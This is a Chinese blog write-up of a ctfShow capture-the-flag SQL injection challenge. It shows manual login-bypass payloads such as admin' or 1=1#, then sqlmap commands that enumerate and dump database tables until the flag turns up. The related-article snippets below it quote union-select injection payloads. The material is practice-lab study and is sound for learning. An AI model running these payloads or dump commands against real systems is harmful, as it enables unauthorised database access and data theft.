ctfShow sql注入笔记

最新推荐文章于 2024-05-19 22:38:58 发布
最新推荐文章于 2024-05-19 22:38:58 发布
阅读量1k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/124613801
版权

sql注入 sqlmap 数据库扫描 联合注入 信息安全
关键词由CSDN通过智能技术生成

遇到了sql注入的题目,记录一下sqlmap使用过程

一、手工注入测试

1、简单的万能注入先测试一下

用户名:admin') or 1=1# /  admin' and 1=1 # admin' or 1=1 # /  admin' and -1=-1 ....

密码:123'

结果没测出来,也没报错,一点反应都没有

二、sqlmap工具扫描

先用sqlmap跑一下,找出注入点

1、将请求包写入1.txt,然后执行sqlmap -r 1.txt --batch

存在时间注入和联合注入,可以利用一下联合注入,但是目前不知道有哪些库和表,先查一下

2、sqlmap -r 1.txt -dbs --batch,ctftraining这个库看着比较像存着flag的数据库,先查看一下

3、sqlmap -r 1.txt -D ctftraining --tables  --batch ,FLAG_TABLE这个表比较像,还是跟着感觉走,查看一下这个表

4、sqlmap -r 1.txt -D ctftraining -T FLAG_TABLE --columns  --batch 

 5、sqlmap -r 1.txt -D ctftraining -T FLAG_TABLE -C "FLAG_COLUMN" --dump  --batch ,空的,感觉错了,从数据库从头再查

6、重复步骤省略,最后在web2数据库下的flag表中发现flag字段,并且成功找到flag

 就很坑,,,,,

 

 

 

whatever`
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
ctf web练习之SQL注入
weixin_51614848的博客
04-19 590
1.首先看题目像SQL注入,于是用burpsuit抓包。针对数据库web2(与题目名字一致)再爆表名,使用指令。备注:本文仅供自用,如有错误,欢迎指出。得到列名,再对列进行爆破,使用指令。把以上所有内容复制到1.txt中。2.使用sqlmap,使用指令。
BUUCTF[Web 1](SQL注入1)
夜思红尘的博客
06-22 333
这里是关于网络安全SQL注入的练习,这里SQL是一个十分危险的漏洞,因此我们要注重有关于SQL注入的防御,同时欢迎大家前来阅读!
ctfshow web201-?(持续更新) sqlmap启动!!!
最新发布
songmoshangchen的博客
05-19 111
【代码】ctfshow web201-?(持续更新) sqlmap启动!!!
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 702
重新来做一遍 争取不看wp。
Ctfshow web-web6 WP
qq_45427131的博客
05-12 403
Ctfshow web-we6 WP 进去看见一个login界面,看上去有点眼熟,好像做过,但是尝试之前做过的方法,回显始终是sql infect error,这样的回显表示输入的值中有非法字符,最后尝试下来是空格被顾虑了,用/**/代替 原来 union select 1,2,3 Web6: union/**/select/**/1,2,3 这样的话,传统艺能手工注入 判断显示位 获取当前连接的数据库 获取数据库中所有表的表名: Select table_name from informatio
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
ctfshow-sql注入(二)
m0_72898152的博客
02-22 424
ctfshow,sql注入sqlmap
CTFshow-WEB入门-SQL注入(下)
feng的博客
02-11 2055
web227 按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。 看了一下y4师傅的WP,原来这题考的是存储过程: 存储过程(Stored Procedure)是一种在数据库中存储复杂程序,以便外部程序调用的一种数据库对象。 存储过程是为了完成特定功能的SQL语句集,经编译创建并保存在数据库中,用户可通过指定存储过程的名字并给定参数(需要时)来调用执行。 存储过程思想上很简单,就是数据库 SQL 语言层面
CTFSHOW-sql注入
Yb_140的博客
08-13 2479
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
ctfshow---sql注入(171-213)
fainpo的博客
05-01 735
这里提一句,为什么不直接替换成acb这种,因为,flag原本就有字母,还原的时候会全部都还原成数字的,数字替换成符号应该也是可以的,这边测试了下除了&#好像别的符号都可以。插入查询后查询语句就会变成这样,由于id=11111这是一个不存在的id,而后面1=1又为真,所以会查询到表内所有的内容,--+是注释后面的字符。因为接受username的时候没有用引号,所以接受单纯的数字,而数字和字符比较会转换类型,字符串会变成数字0进行比较,所以相等。
ctfshow_sql注入
qq_45951598的博客
03-14 1436
文章目录WEB172WEB173 WEB172 查询语句 //拼接sql语句查找指定ID用户 sql = “select username,password from ctfshow_user2 where username !=‘flag’ and id = '”.$_GET[‘id’]."’ limit 1;"; 返回逻辑 //检查结果是否有flag if($row->username!==‘flag’){ $ret[‘msg’]=‘查询成功’; } 这里说我们返回的语句中不能包含flag
CTFSHOW SQL注入篇(191-210)
羽的博客
06-07 1216
ctfshow sql篇
BUUCTF EASY SQLI(虚拟用户)
qq_54929891的博客
03-01 1178
打开题目发现是一个登录框题目 ,按照常理一般UserName都是admin,密码随便弄一个试试 改变一下admin,会出来wrong user;看来账号就是admin了,想着这种题目不可能让我们死去注入吧,应该会有提示,便打开F12看看 发现有个注释的字符串,猜测是base32编码,因为: base64编码中包含大写字母(A-Z),小写字母(a-z),数字0-9以及+ / base32编码中只有大写字母(A-Z),数字234567,如果没有189就是base32编码 base16编码也..
BUUCTF在线测评之[极客大挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5416
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一题是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出题者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
ctfshow sql183
08-31
根据提供的引用内容,我们可以看出ctfshow sql183可能是一个SQL注入漏洞的例子。在引用中,我们可以看到一个SQL语句的示例,其中用户名(username)和密码(password)是通过变量传入的。在引用中,我们可以看到一个可能的注入例子,其中密码参数包含特殊字符(\),并且用户名参数包含了恶意代码(database())。这会导致最终构成的SQL语句中的密码被修改为'\',并且用户名参数中的恶意代码被注入。在引用中,我们可以看到类似的注入情况,但这次是在NoSQL中使用正则表达式来寻找以"ctfshow{"开头的密码。 根据以上信息,ctfshow sql183可能是演示SQL注入漏洞的一个案例。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CTFshow sql注入 上篇(web221-253)](https://blog.csdn.net/Kracxi/article/details/124094102)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTFSHOW SQL注入篇(231-253)](https://blog.csdn.net/miuzzx/article/details/125220318)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值